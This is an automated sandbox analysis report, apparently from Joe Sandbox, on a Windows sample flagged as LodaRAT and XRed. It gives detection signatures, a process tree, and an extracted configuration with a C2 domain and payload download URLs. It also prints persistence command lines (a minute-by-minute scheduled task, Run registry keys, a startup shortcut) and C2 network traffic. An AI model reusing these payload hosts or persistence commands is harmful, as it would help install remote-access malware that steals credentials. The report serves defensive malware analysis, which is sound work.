Windows Analysis Report
LWQDFZ.exe

Overview

General Information

Sample name: LWQDFZ.exe
Analysis ID: 1582337
MD5: 27bcc0d927e9f13250b1dff9e122e9af
SHA1: 2f9f09f46fe7ee2a495247292b3f2be0777c2873
SHA256: 71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1
Tags: exeknkbkk212user-JAMESWT_MHT

Detection

LodaRAT, XRed
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LodaRAT
Yara detected XRed
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Drops PE files to the document folder of the user
Found API chain indicative of sandbox detection
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains executable resources (Code or Archives)
Potential key logger detected (key state polling based)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected ProcessChecker

Classification

  • System is w10x64
  • LWQDFZ.exe (PID: 7352 cmdline: "C:\Users\user\Desktop\LWQDFZ.exe" MD5: 27BCC0D927E9F13250B1DFF9E122E9AF)
    • ._cache_LWQDFZ.exe (PID: 7436 cmdline: "C:\Users\user\Desktop\._cache_LWQDFZ.exe" MD5: 541FC19BE6471027AFB1DD324E4A8A80)
      • cmd.exe (PID: 7568 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn MHDFGY.exe /tr C:\Users\user\AppData\Roaming\Windata\KQNALS.exe /sc minute /mo 1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 7624 cmdline: schtasks /create /tn MHDFGY.exe /tr C:\Users\user\AppData\Roaming\Windata\KQNALS.exe /sc minute /mo 1 MD5: 48C2FE20575769DE916F48EF0676A965)
      • wscript.exe (PID: 7632 cmdline: WSCript C:\Users\user\AppData\Local\Temp\MHDFGY.vbs MD5: FF00E0480075B095948000BDC66E81F0)
    • Synaptics.exe (PID: 7464 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: 84A6CCB0838DA0E05CC6763275C2EE1C)
      • WerFault.exe (PID: 5528 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7464 -s 12448 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 6196 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7464 -s 12508 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 2960 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7464 -s 12500 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • EXCEL.EXE (PID: 7544 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
  • KQNALS.exe (PID: 7720 cmdline: C:\Users\user\AppData\Roaming\Windata\KQNALS.exe MD5: 541FC19BE6471027AFB1DD324E4A8A80)
  • KQNALS.exe (PID: 280 cmdline: "C:\Users\user\AppData\Roaming\Windata\KQNALS.exe" MD5: 541FC19BE6471027AFB1DD324E4A8A80)
  • Synaptics.exe (PID: 1880 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" MD5: 84A6CCB0838DA0E05CC6763275C2EE1C)
  • KQNALS.exe (PID: 7420 cmdline: "C:\Users\user\AppData\Roaming\Windata\KQNALS.exe" MD5: 541FC19BE6471027AFB1DD324E4A8A80)
  • KQNALS.exe (PID: 7736 cmdline: "C:\Users\user\AppData\Roaming\Windata\KQNALS.exe" MD5: 541FC19BE6471027AFB1DD324E4A8A80)
  • KQNALS.exe (PID: 2596 cmdline: C:\Users\user\AppData\Roaming\Windata\KQNALS.exe MD5: 541FC19BE6471027AFB1DD324E4A8A80)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
Loda, LodaRAT | Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as Trojan.Nymeria, although the connection is not well-documented. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.loda
{"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
Source | Rule | Description | Author | Strings
LWQDFZ.exe | JoeSecurity_XRed | Yara detected XRed | Joe Security |
LWQDFZ.exe | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\MHDFGY.vbs | JoeSecurity_ProcessChecker | Yara detected ProcessChecker | Joe Security |
C:\ProgramData\Synaptics\RCXFBD9.tmp | JoeSecurity_XRed | Yara detected XRed | Joe Security |
C:\ProgramData\Synaptics\RCXFBD9.tmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
C:\Users\user\Documents\AIXACVYBSB\~$cache1 | JoeSecurity_XRed | Yara detected XRed | Joe Security |
C:\Users\user\Documents\AIXACVYBSB\~$cache1 | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |

Source | Rule | Description | Author | Strings
00000003.00000003.1511897808.000000000074E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_XRed | Yara detected XRed | Joe Security |
00000002.00000002.3037281317.00000000042E7000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_ProcessChecker | Yara detected ProcessChecker | Joe Security |
00000000.00000000.1390370601.0000000000401000.00000020.00000001.01000000.00000003.sdmp | JoeSecurity_XRed | Yara detected XRed | Joe Security |
00000000.00000000.1390370601.0000000000401000.00000020.00000001.01000000.00000003.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
00000008.00000002.3020785623.0000000003488000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_ProcessChecker | Yara detected ProcessChecker | Joe Security |

Source | Rule | Description | Author | Strings
0.0.LWQDFZ.exe.400000.0.unpack | JoeSecurity_XRed | Yara detected XRed | Joe Security |
0.0.LWQDFZ.exe.400000.0.unpack | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |

System Summary

Source: Network Connection | Author: Florian Roth (Nextron Systems) | Data: DestinationIp: 172.111.138.100, DestinationIsIpv6: false, DestinationPort: 5552, EventID: 3, Image: C:\Users\user\Desktop\._cache_LWQDFZ.exe, Initiated: true, ProcessId: 7436, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49714
Source: Process started | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) | Data: Command: WSCript C:\Users\user\AppData\Local\Temp\MHDFGY.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\MHDFGY.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_LWQDFZ.exe" , ParentImage: C:\Users\user\Desktop\._cache_LWQDFZ.exe, ParentProcessId: 7436, ParentProcessName: ._cache_LWQDFZ.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\MHDFGY.vbs, ProcessId: 7632, ProcessName: wscript.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton | Data: Command: WSCript C:\Users\user\AppData\Local\Temp\MHDFGY.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\MHDFGY.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_LWQDFZ.exe" , ParentImage: C:\Users\user\Desktop\._cache_LWQDFZ.exe, ParentProcessId: 7436, ParentProcessName: ._cache_LWQDFZ.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\MHDFGY.vbs, ProcessId: 7632, ProcessName: wscript.exe
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: WSCript C:\Users\user\AppData\Local\Temp\MHDFGY.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\MHDFGY.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_LWQDFZ.exe" , ParentImage: C:\Users\user\Desktop\._cache_LWQDFZ.exe, ParentProcessId: 7436, ParentProcessName: ._cache_LWQDFZ.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\MHDFGY.vbs, ProcessId: 7632, ProcessName: wscript.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\Users\user\AppData\Roaming\Windata\KQNALS.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\._cache_LWQDFZ.exe, ProcessId: 7436, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MHDFGY
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\Desktop\._cache_LWQDFZ.exe, ProcessId: 7436, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MHDFGY.lnk
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: schtasks /create /tn MHDFGY.exe /tr C:\Users\user\AppData\Roaming\Windata\KQNALS.exe /sc minute /mo 1, CommandLine: schtasks /create /tn MHDFGY.exe /tr C:\Users\user\AppData\Roaming\Windata\KQNALS.exe /sc minute /mo 1, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn MHDFGY.exe /tr C:\Users\user\AppData\Roaming\Windata\KQNALS.exe /sc minute /mo 1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7568, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn MHDFGY.exe /tr C:\Users\user\AppData\Roaming\Windata\KQNALS.exe /sc minute /mo 1, ProcessId: 7624, ProcessName: schtasks.exe
Source: Process started | Author: Michael Haag | Data: Command: WSCript C:\Users\user\AppData\Local\Temp\MHDFGY.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\MHDFGY.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_LWQDFZ.exe" , ParentImage: C:\Users\user\Desktop\._cache_LWQDFZ.exe, ParentProcessId: 7436, ParentProcessName: ._cache_LWQDFZ.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\MHDFGY.vbs, ProcessId: 7632, ProcessName: wscript.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\ProgramData\Synaptics\Synaptics.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\LWQDFZ.exe, ProcessId: 7352, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver
Source: File created | Author: Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\ProgramData\Synaptics\Synaptics.exe, ProcessId: 7464, TargetFilename: C:\Users\user\AppData\Local\Temp\c2jUHMi5.xlsm

AV Detection

Source: LWQDFZ.exe | Avira: detected
Source: http://xred.site50.net/syn/Synaptics.rarh | Avira URL Cloud: Label: malware
Source: http://xred.site50.net/syn/SSLLibrary.dlD | Avira URL Cloud: Label: malware
Source: C:\ProgramData\Synaptics\Synaptics.exe | Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\ProgramData\Synaptics\Synaptics.exe | Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\ProgramData\Synaptics\RCXFBD9.tmp | Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\ProgramData\Synaptics\RCXFBD9.tmp | Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\Users\user\Documents\AIXACVYBSB\~$cache1 | Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\Users\user\Documents\AIXACVYBSB\~$cache1 | Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\Users\user\AppData\Local\Temp\MHDFGY.vbs | Avira: detection malicious, Label: VBS/Runner.VPJI
Source: LWQDFZ.exe | Malware Configuration Extractor: XRed {"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
Source: C:\ProgramData\Synaptics\RCXFBD9.tmp | ReversingLabs: Detection: 100%
Source: C:\ProgramData\Synaptics\Synaptics.exe | ReversingLabs: Detection: 92%
Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exe | ReversingLabs: Detection: 52%
Source: C:\Users\user\Desktop\._cache_LWQDFZ.exe | ReversingLabs: Detection: 52%
Source: C:\Users\user\Documents\AIXACVYBSB\~$cache1 | ReversingLabs: Detection: 100%
Source: LWQDFZ.exe | ReversingLabs: Detection: 92%
Source: Submited Sample | Integrated Neural Analysis Model: Matched 85.9% probability
Source: C:\Users\user\Desktop\._cache_LWQDFZ.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exe | Joe Sandbox ML: detected
Source: C:\ProgramData\Synaptics\Synaptics.exe | Joe Sandbox ML: detected
Source: C:\ProgramData\Synaptics\RCXFBD9.tmp | Joe Sandbox ML: detected
Source: C:\Users\user\Documents\AIXACVYBSB\~$cache1 | Joe Sandbox ML: detected
Source: LWQDFZ.exe | Joe Sandbox ML: detected
Source: LWQDFZ.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
                              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49847 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49848 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49849 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49856 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49859 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49866 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49867 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49870 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49872 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49879 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49878 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49884 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49883 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49890 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49889 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49898 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49899 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49907 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49910 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49911 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49913 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49916 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49918 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49931 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49928 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49930 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49929 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49935 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49934 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49936 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49937 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49944 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49945 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49949 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49952 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49956 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49957 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49959 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49966 version: TLS 1.2
                              Source: LWQDFZ.exe, 00000000.00000000.1390370601.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: [autorun]
                              Source: LWQDFZ.exe, 00000000.00000000.1390370601.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: autorun.inf
                              Source: Synaptics.exe, 00000003.00000003.1511897808.000000000074E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                              Source: Synaptics.exe, 00000003.00000003.1511897808.000000000074E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autorun.inf
                              Source: LWQDFZ.exeBinary or memory string: [autorun]
                              Source: LWQDFZ.exeBinary or memory string: autorun.inf
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003BDD92 GetFileAttributesW,FindFirstFileW,FindClose,2_2_003BDD92
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003F2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_003F2044
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003F219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_003F219F
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003F24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_003F24A9
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003E6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,2_2_003E6B3F
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003E6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,2_2_003E6E4A
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003EF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_003EF350
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003EFD47 FindFirstFileW,FindClose,2_2_003EFD47
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003EFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_003EFDD2
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006C2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,9_2_006C2044
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006C219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,9_2_006C219F
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006C24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,9_2_006C24A9
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006B6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,9_2_006B6B3F
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006B6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,9_2_006B6E4A
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006BF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,9_2_006BF350
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006BFD47 FindFirstFileW,FindClose,9_2_006BFD47
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006BFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,9_2_006BFDD2
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_0068DD92 GetFileAttributesW,FindFirstFileW,FindClose,9_2_0068DD92
                              Source: C:\Users\user\Desktop\LWQDFZ.exeFile opened: C:\Users\user\AppData\Roaming
                              Source: C:\Users\user\Desktop\LWQDFZ.exeFile opened: C:\Users\user\AppData
                              Source: C:\Users\user\Desktop\LWQDFZ.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                              Source: C:\Users\user\Desktop\LWQDFZ.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
                              Source: C:\Users\user\Desktop\LWQDFZ.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
